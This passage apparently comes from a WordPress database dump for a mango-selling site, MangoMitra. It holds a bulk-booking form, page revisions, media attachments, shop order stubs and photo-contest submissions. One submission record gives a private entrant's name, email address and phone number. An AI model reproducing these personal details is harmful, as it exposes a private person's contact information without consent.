Number\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"checkbox\",\"label\":\"Select Mangoes For Bulk Booking\",\"choices\":{\"1\":{\"label\":\"Devagad Alphonso\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Ratnagiri Alphonso\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Dasheri\",\"value\":\"\",\"image\":\"\"},\"14\":{\"label\":\"Totapuri \",\"value\":\"\",\"image\":\"\"},\"15\":{\"label\":\"Banginapalli\",\"value\":\"\",\"image\":\"\"},\"16\":{\"label\":\"Neelam\",\"value\":\"\",\"image\":\"\"},\"17\":{\"label\":\"Hapus\",\"value\":\"\",\"image\":\"\"},\"18\":{\"label\":\"Sindhura\",\"value\":\"\",\"image\":\"\"},\"19\":{\"label\":\"Raspuri\",\"value\":\"\",\"image\":\"\"},\"20\":{\"label\":\"Himasagar\",\"value\":\"\",\"image\":\"\"},\"21\":{\"label\":\"Malgova\",\"value\":\"\",\"image\":\"\"},\"22\":{\"label\":\"Kesar\",\"value\":\"\",\"image\":\"\"},\"23\":{\"label\":\"Langra\",\"value\":\"\",\"image\":\"\"},\"24\":{\"label\":\"Imam Pasand\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"choices_images_style\":\"modern\",\"input_columns\":\"3\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"1234\",\"field_id\":10,\"settings\":{\"form_title\":\"Bulk Booking\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Bulk Booking Order\",\"sender_name\":\"MangoMitra\",\"sender_address\":\"mango@homedirect.in\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"560\",\"redirect\":\"\"}}},\"meta\":{\"template\":\"blank\"}}','Bulk Booking','','publish','closed','closed','','blank-form-2','','','2022-03-09 13:22:50','2022-03-09 07:52:50','',0,'https://mangomitra.in/?post_type=wpforms&#038;p=1234',0,'wpforms','',0),(1235,1,'2022-03-09 12:32:22','2022-03-09 07:02:22','','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-09 12:32:22','2022-03-09 07:02:22','',1204,'https://mangomitra.in/?p=1235',0,'revision','',0),(1236,1,'2022-03-09 12:33:59','2022-03-09 07:03:59','<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-09 12:33:59','2022-03-09 07:03:59','',1204,'https://mangomitra.in/?p=1236',0,'revision','',0),(1238,1,'2022-03-09 12:51:08','2022-03-09 07:21:08',' ','','','publish','closed','closed','','1238','','','2022-03-09 12:51:08','2022-03-09 07:21:08','',0,'https://mangomitra.in/2022/03/09/1238/',2,'nav_menu_item','',0),(1239,1,'2022-03-09 12:52:43','2022-03-09 07:22:43','','121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view','','inherit','open','closed','','121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view','','','2022-03-09 12:52:43','2022-03-09 07:22:43','',1204,'https://mangomitra.in/wp-content/uploads/2022/03/121127525-cut-ripe-mangoes-and-space-for-text-on-color-background-top-view.webp',0,'attachment','image/webp',0),(1241,1,'2022-03-09 12:54:31','2022-03-09 07:24:31','','bg-01','','inherit','open','closed','','bg-01-3','','','2022-03-09 12:54:31','2022-03-09 07:24:31','',1204,'https://mangomitra.in/wp-content/uploads/2022/03/bg-01.png',0,'attachment','image/png',0),(1242,1,'2022-03-09 12:56:28','2022-03-09 07:26:28','<!-- wp:cover {\"url\":\"https://mangomitra.in/wp-content/uploads/2022/03/bg-01-1024x576.png\",\"id\":1241,\"dimRatio\":50,\"isDark\":false,\"style\":{\"color\":{}}} -->\n<div class=\"wp-block-cover is-light\"><span aria-hidden=\"true\" class=\"wp-block-cover__gradient-background has-background-dim\"></span><img class=\"wp-block-cover__image-background wp-image-1241\" alt=\"\" src=\"https://mangomitra.in/wp-content/uploads/2022/03/bg-01-1024x576.png\" data-object-fit=\"cover\"/><div class=\"wp-block-cover__inner-container\"><!-- wp:heading {\"level\":3} -->\n<h3>Order in bulk for your community, get discounts &amp; win free mango boxes!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Become a MangoMitra representative for your apartment/society and order in bulk. You get complimentary boxes of mangoes from MangoMitra!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We take large orders of mangoes for apartments and housing complexes. Please fill in the enquiry form below with your details and we’ll get in touch with you. Minimum order of 10 mango boxes qualifies as a bulk booking. This option is valid for apartments/complexes within a single community.</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\n\n<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-09 12:56:28','2022-03-09 07:26:28','',1204,'https://mangomitra.in/?p=1242',0,'revision','',0),(1243,1,'2022-03-09 12:57:58','2022-03-09 07:27:58','','bg-01-2','','inherit','open','closed','','bg-01-2-2','','','2022-03-09 12:57:58','2022-03-09 07:27:58','',1204,'https://mangomitra.in/wp-content/uploads/2022/03/bg-01-2.png',0,'attachment','image/png',0),(1245,1,'2022-03-09 12:58:20','2022-03-09 07:28:20','<!-- wp:cover {\"url\":\"https://mangomitra.in/wp-content/uploads/2022/03/bg-01-2.png\",\"id\":1243,\"dimRatio\":50,\"isDark\":false,\"style\":{\"color\":{}}} -->\n<div class=\"wp-block-cover is-light\"><span aria-hidden=\"true\" class=\"wp-block-cover__gradient-background has-background-dim\"></span><img class=\"wp-block-cover__image-background wp-image-1243\" alt=\"\" src=\"https://mangomitra.in/wp-content/uploads/2022/03/bg-01-2.png\" data-object-fit=\"cover\"/><div class=\"wp-block-cover__inner-container\"><!-- wp:heading {\"level\":3} -->\n<h3>Order in bulk for your community, get discounts &amp; win free mango boxes!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Become a MangoMitra representative for your apartment/society and order in bulk. You get complimentary boxes of mangoes from MangoMitra!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We take large orders of mangoes for apartments and housing complexes. Please fill in the enquiry form below with your details and we’ll get in touch with you. Minimum order of 10 mango boxes qualifies as a bulk booking. This option is valid for apartments/complexes within a single community.</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\n\n<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-09 12:58:20','2022-03-09 07:28:20','',1204,'https://mangomitra.in/?p=1245',0,'revision','',0),(1246,1,'2022-03-09 13:05:26','2022-03-09 07:35:26','','jhgjhjk','','inherit','open','closed','','jhgjhjk','','','2022-03-09 13:05:26','2022-03-09 07:35:26','',1204,'https://mangomitra.in/wp-content/uploads/2022/03/jhgjhjk.png',0,'attachment','image/png',0),(1248,1,'2022-03-09 13:06:12','2022-03-09 07:36:12','<!-- wp:image {\"id\":1246,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/03/jhgjhjk-1024x576.png\" alt=\"\" class=\"wp-image-1246\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-09 13:06:12','2022-03-09 07:36:12','',1204,'https://mangomitra.in/?p=1248',0,'revision','',0),(1249,1,'2022-03-09 15:01:23','2022-03-09 09:31:23','<!-- wp:image {\"id\":1246,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/03/jhgjhjk-1024x576.png\" alt=\"\" class=\"wp-image-1246\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-09 15:01:23','2022-03-09 09:31:23','',1204,'https://mangomitra.in/?p=1249',0,'revision','',0),(1251,1,'2022-03-10 10:29:01','2022-03-10 04:59:01','','bulk_booking_form','','inherit','open','closed','','bulk_booking_form','','','2022-03-10 10:29:01','2022-03-10 04:59:01','',1204,'https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),(1252,1,'2022-03-10 11:46:28','2022-03-10 06:16:28','[wordpress_file_upload]<!-- wp:image {\"id\":1246,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/03/jhgjhjk-1024x576.png\" alt=\"\" class=\"wp-image-1246\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-10 11:46:28','2022-03-10 06:16:28','',1204,'https://mangomitra.in/?p=1252',0,'revision','',0),(1253,1,'2022-03-10 11:47:51','2022-03-10 06:17:51','[wordpress_file_upload createpath=\"false\"]<!-- wp:image {\"id\":1246,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://mangomitra.in/wp-content/uploads/2022/03/jhgjhjk-1024x576.png\" alt=\"\" class=\"wp-image-1246\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-10 11:47:51','2022-03-10 06:17:51','',1204,'https://mangomitra.in/?p=1253',0,'revision','',0),(1255,1,'2022-03-10 11:52:40','2022-03-10 06:22:40','','bulk_booking_form-3','','inherit','open','closed','','bulk_booking_form-3','','','2022-03-10 11:52:40','2022-03-10 06:22:40','',1204,'https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),(1256,1,'2022-03-10 11:57:21','2022-03-10 06:27:21','\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:shortcode -->\n[wpforms id=\"1234\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:file {\"id\":1255,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-dcb4210e-6709-4c4a-bfa3-6de37ed31817\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\">Excel sheet</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-dcb4210e-6709-4c4a-bfa3-6de37ed31817\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[wordpress_file_upload createpath=\"false\"]\n<!-- /wp:shortcode -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-10 11:57:21','2022-03-10 06:27:21','',1204,'https://mangomitra.in/?p=1256',0,'revision','',0),(1259,1,'2022-03-11 17:03:18','2022-03-11 11:33:18','','Artboard 2-8 (2)','','inherit','closed','closed','','artboard-2-8-2','','','2022-03-11 17:03:18','2022-03-11 11:33:18','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-2-8-2.png',0,'attachment','image/png',0),(1260,1,'2022-03-11 17:03:21','2022-03-11 11:33:21','','Artboard 3-8 (3)','','inherit','closed','closed','','artboard-3-8-3','','','2022-03-11 17:03:21','2022-03-11 11:33:21','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-3-8-3.png',0,'attachment','image/png',0),(1261,1,'2022-03-11 17:03:24','2022-03-11 11:33:24','','Artboard 4-8 (2)','','inherit','closed','closed','','artboard-4-8-2','','','2022-03-11 17:03:24','2022-03-11 11:33:24','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-4-8-2.png',0,'attachment','image/png',0),(1262,1,'2022-03-11 17:05:24','2022-03-11 11:35:24','','Artboard 1-8 (2)','','inherit','closed','closed','','artboard-1-8-2-2','','','2022-03-11 17:05:24','2022-03-11 11:35:24','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-1-8-2.png',0,'attachment','image/png',0),(1265,27,'2022-03-14 11:30:52','2022-03-14 06:00:52','','16467550021265415014715830241814','','inherit','closed','closed','','16467550021265415014715830241814','','','2022-03-14 11:30:52','2022-03-14 06:00:52','',1266,'/storage/v6964/mangomitra/public_html/wp-content/uploads/2022/03/16467550021265415014715830241814.jpg',0,'attachment','image/jpeg',0),(1266,27,'2022-03-14 11:30:52','2022-03-14 06:00:52','{\"fields\":{\"field\":\"pavithra g\",\"field_copy\":\"pavitra@utfindia.in\",\"field_copy_copy\":\"07411722844\",\"field_copy_copy_copy\":1265,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":{\"field_copy_copy_copy\":{\"type\":\"attachment\",\"attachment\":{\"id\":1265,\"type\":\"image\",\"url\":\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814.jpg\"},\"thumbnail\":{\"id\":1265,\"url\":\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814-150x150.jpg\"},\"preview\":\"[totalcontest-image id=\\\"1265\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814-150x150.jpg\\\"]\",\"content\":\"[totalcontest-image id=\\\"1265\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814.jpg\\\"]\"}},\"token\":\"6cf30036-7f38-48ab-b6f2-60a02174c452\",\"meta\":{\"schema\":\"1.0\"}}','Submissionname','','publish','closed','closed','','1266','','','2022-03-14 11:30:52','2022-03-14 06:00:52','',900,'https://mangomitra.in/contest/photo-contest/submission/1266/',0,'contest_submission','',0),(1267,27,'2022-03-14 11:30:52','2022-03-14 06:00:52','{\"fields\":{\"field\":\"pavithra g\",\"field_copy\":\"pavitra@utfindia.in\",\"field_copy_copy\":\"07411722844\",\"field_copy_copy_copy\":1265,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":{\"field_copy_copy_copy\":{\"type\":\"attachment\",\"attachment\":{\"id\":1265,\"type\":\"image\",\"url\":\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814.jpg\"},\"thumbnail\":{\"id\":1265,\"url\":\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814-150x150.jpg\"},\"preview\":\"[totalcontest-image id=\\\"1265\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814-150x150.jpg\\\"]\",\"content\":\"[totalcontest-image id=\\\"1265\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/03/16467550021265415014715830241814.jpg\\\"]\"}},\"token\":\"6cf30036-7f38-48ab-b6f2-60a02174c452\",\"meta\":{\"schema\":\"1.0\"}}','Submissionname','','inherit','closed','closed','','1266-revision-v1','','','2022-03-14 11:30:52','2022-03-14 06:00:52','',1266,'https://mangomitra.in/?p=1267',0,'revision','',0),(1268,27,'2022-03-14 11:34:02','2022-03-14 06:04:02','{\"fields\":{\"field\":\"\",\"field_copy\":\"\",\"field_copy_copy\":\"\",\"field_copy_copy_copy\":null,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":[],\"token\":\"861c112d-1f64-4f1c-ad18-03dac52255a8\",\"meta\":{\"schema\":\"1.0\"}}','Submissionname','','publish','closed','closed','','1268','','','2022-03-14 11:34:02','2022-03-14 06:04:02','',900,'https://mangomitra.in/contest/photo-contest/submission/1268/',0,'contest_submission','',0),(1269,27,'2022-03-14 11:34:02','2022-03-14 06:04:02','{\"fields\":{\"field\":\"\",\"field_copy\":\"\",\"field_copy_copy\":\"\",\"field_copy_copy_copy\":null,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":[],\"token\":\"861c112d-1f64-4f1c-ad18-03dac52255a8\",\"meta\":{\"schema\":\"1.0\"}}','Submissionname','','inherit','closed','closed','','1268-revision-v1','','','2022-03-14 11:34:02','2022-03-14 06:04:02','',1268,'https://mangomitra.in/?p=1269',0,'revision','',0),(1270,1,'2022-03-15 09:48:15','2022-03-15 04:18:15','','Untitled-2 [Recovered]-01','','inherit','closed','closed','','untitled-2-recovered-01','','','2022-03-15 09:48:15','2022-03-15 04:18:15','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Untitled-2-Recovered-01.png',0,'attachment','image/png',0),(1272,1,'2022-03-15 09:48:35','2022-03-15 04:18:35','','Untitled-2 [Recovered]-02','','inherit','closed','closed','','untitled-2-recovered-02','','','2022-03-15 09:48:35','2022-03-15 04:18:35','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Untitled-2-Recovered-02.png',0,'attachment','image/png',0),(1273,1,'2022-03-15 09:48:54','2022-03-15 04:18:54','','Untitled-2 [Recovered]-03','','inherit','closed','closed','','untitled-2-recovered-03','','','2022-03-15 09:48:54','2022-03-15 04:18:54','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Untitled-2-Recovered-03.png',0,'attachment','image/png',0),(1274,1,'2022-03-15 09:49:14','2022-03-15 04:19:14','','Untitled-2 [Recovered]-04','','inherit','closed','closed','','untitled-2-recovered-04','','','2022-03-15 09:49:14','2022-03-15 04:19:14','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Untitled-2-Recovered-04.png',0,'attachment','image/png',0),(1275,28,'2022-03-15 12:55:22','2022-03-15 07:25:22','','8','','inherit','closed','closed','','8-3','','','2022-03-15 12:55:45','2022-03-15 07:25:45','',0,'https://mangomitra.in/wp-content/uploads/2022/03/8-2.jpg',0,'attachment','image/jpeg',0),(1277,1,'2022-03-15 13:14:38','2022-03-15 07:44:38','','Order &ndash; March 15, 2022 @ 01:14 PM','','wc-completed','open','closed','wc_order_ETV0SU281CsNX','order-mar-15-2022-0744-am','','','2022-03-15 13:19:25','2022-03-15 07:49:25','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1277',0,'shop_order','',9),(1278,1,'2022-03-15 13:20:57','2022-03-15 07:50:57','','Order &ndash; March 15, 2022 @ 01:20 PM','','wc-processing','open','closed','wc_order_7WMdpdIEO8OdU','order-mar-15-2022-0750-am','','','2022-03-15 13:20:57','2022-03-15 07:50:57','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1278',0,'shop_order','',3),(1279,1,'2022-03-15 13:28:20','2022-03-15 07:58:20','','Order &ndash; March 15, 2022 @ 01:28 PM','','wc-completed','open','closed','wc_order_9Cfkud7nMciEf','order-mar-15-2022-0758-am','','','2022-03-15 13:29:10','2022-03-15 07:59:10','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1279',0,'shop_order','',5),(1280,1,'2022-03-15 13:32:38','2022-03-15 08:02:38','','Order &ndash; March 15, 2022 @ 01:32 PM','','wc-processing','open','closed','wc_order_DrlY1pZXI0fnG','order-mar-15-2022-0802-am','','','2022-03-15 13:32:38','2022-03-15 08:02:38','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1280',0,'shop_order','',2),(1283,1,'2022-03-15 15:16:52','2022-03-15 09:46:52','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Download excel sheet, fill thevdetails and sent it to mango@homedirect.in.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1255,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-0c901bb3-e6a6-4e51-beba-ed9853dbc3c6\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\"><br>Excel sheet</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-0c901bb3-e6a6-4e51-beba-ed9853dbc3c6\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-15 15:16:52','2022-03-15 09:46:52','',1204,'https://mangomitra.in/?p=1283',0,'revision','',0),(1284,1,'2022-03-15 15:17:51','2022-03-15 09:47:51','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download excel sheet, fill the details and sent it to mango@homedirect.in.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1255,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-7c05f519-7ff9-4278-a68f-834dc590a9ed\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\"><br>Excel sheet</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-3.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-7c05f519-7ff9-4278-a68f-834dc590a9ed\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-15 15:17:51','2022-03-15 09:47:51','',1204,'https://mangomitra.in/?p=1284',0,'revision','',0),(1286,21,'2022-03-16 15:48:42','2022-03-16 10:18:42','','devgad alphonso','','inherit','closed','closed','','devgad-alphonso-2','','','2022-03-16 15:57:42','2022-03-16 10:27:42','',0,'https://mangomitra.in/wp-content/uploads/2022/03/devgad-alphonso-1.jpg',0,'attachment','image/jpeg',0),(1290,1,'2022-03-16 16:42:48','2022-03-16 11:12:48','','bulk_booking_form-1','','inherit','open','closed','','bulk_booking_form-1','','','2022-03-16 16:42:48','2022-03-16 11:12:48','',1204,'https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),(1291,1,'2022-03-16 16:43:00','2022-03-16 11:13:00','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download excel sheet, fill the details and sent it to mango@homedirect.in.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1290,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-11eb7c59-583e-44ec-b32b-e28fe2b29256\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\">bulk_booking_form</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-11eb7c59-583e-44ec-b32b-e28fe2b29256\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-16 16:43:00','2022-03-16 11:13:00','',1204,'https://mangomitra.in/?p=1291',0,'revision','',0),(1292,1,'2022-03-16 16:43:42','2022-03-16 11:13:42','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download bulk booking form, fill the details and sent it to mango@homedirect.in.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1290,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-aceb8eb2-8e09-456f-8310-cbf9466d1db1\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\">bulk_booking_form</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-aceb8eb2-8e09-456f-8310-cbf9466d1db1\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-16 16:43:42','2022-03-16 11:13:42','',1204,'https://mangomitra.in/?p=1292',0,'revision','',0),(1293,1,'2022-03-16 16:44:07','2022-03-16 11:14:07','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download bulk booking form, fill the details and send it to mango@homedirect.in.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1290,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\">bulk_booking_form</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-16 16:44:07','2022-03-16 11:14:07','',1204,'https://mangomitra.in/?p=1293',0,'revision','',0),(1294,1,'2022-03-16 17:36:03','2022-03-16 12:06:03','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download bulk booking form, fill the details and send it to <a href=\"mango@homedirect.in\" data-type=\"URL\" data-id=\"mango@homedirect.in\">mango@homedirect.in.</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1290,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\">bulk_booking_form</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\" class=\"wp-block-file__button\" download 